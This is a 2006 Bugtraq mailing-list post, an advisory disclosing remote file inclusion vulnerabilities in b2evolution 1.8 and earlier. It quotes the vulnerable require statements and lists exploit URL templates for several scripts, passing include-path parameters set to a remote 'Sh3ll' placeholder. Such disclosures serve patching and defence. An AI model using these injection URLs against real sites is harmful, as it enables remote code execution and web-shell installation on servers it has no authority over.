Submit ( b2evolution<= 1.8 Remote File Include Vulnerabilities )

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Submit ( b2evolution<= 1.8 Remote File Include Vulnerabilities )
From: h4ck3riran@xxxxxxxxx
Date: 29 Aug 2006 12:07:42 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

*******************************************************************************
***                                                                             
                                                                                
    ***
***                                                                             
                                                                                
    ***
***                                                                             
                                                                                
    ***
***                                           PerSiaNFoX DigitaL SecuritY TeaM  
                                               ***                              
                                                                               
***                                                                             
                                                                                
    ***
***                                                                             
                                                                                
    ***
***                                                                             
                                                                                
    ***
*******************************************************************************

<#  b2evolution<= 1.8 Remote File Include Vulnerabilities 

<# Script.............. : b2evolution
<# Discovered By.... : Root3r_H3ll      
<# Location .......... : Iran
<# Class..............  : Remote
<# Original Advisory : http://Www.PersainFox.com
<# We ArE : Root3r_H3LL , Arash.RJ
<#Spical TNX HB Team , All My Freinds

-------------------------------------------------------------------------------------------------------------

< # CodE :require $inc_path.'_blog_main.inc.php'

< #Expolit :
< #http://Www.Site.CoM/[Path]/blogs/admin.php?inc_path=Sh3ll
< #http://Www.Site.CoM/[Path]/blogs/index.php?inc_path=Sh3ll
< #http://Www.Site.CoM/[Path]/blogs/default.php?inc_path=Sh3ll
< #http://Www.Site.CoM/[Path]/blogs/multiblogs.php?inc_path=Sh3ll
< #http://Www.Site.CoM/[Path]/blogs/summary.php?inc_path=Sh3ll
< #http://Www.Site.CoM/[Path]/blogs/cron/getmail.php?inc_path=Sh3ll
< #http://Www.Site.CoM/[Path]/blogs/cron/cron_exec.php?inc_path=Sh3ll
< #http://Www.Site.CoM/[Path]/blogs/cron/cron_exec.php?model_path=Sh3ll

< # CodE :   require $misc_inc_path.'_log.class.php'

< #Expolit :
< #http://Www.Site.coM/[Path]/gettext/ststicfiles.php?misc_inc_path= Sh3ll

Prev by Date: e107 <= 0.75 GLOBALS[] overwrite/Zend_Hash_Del_Key_Or_Index remote commands execution
Next by Date: Submit ( ToendaCMS<= ( Remote File Include Vulnerabilities )
Previous by thread: e107 <= 0.75 GLOBALS[] overwrite/Zend_Hash_Del_Key_Or_Index remote commands execution
Next by thread: Re: Submit ( b2evolution<= 1.8 Remote File Include Vulnerabilities )
Index(es):
- Date
- Thread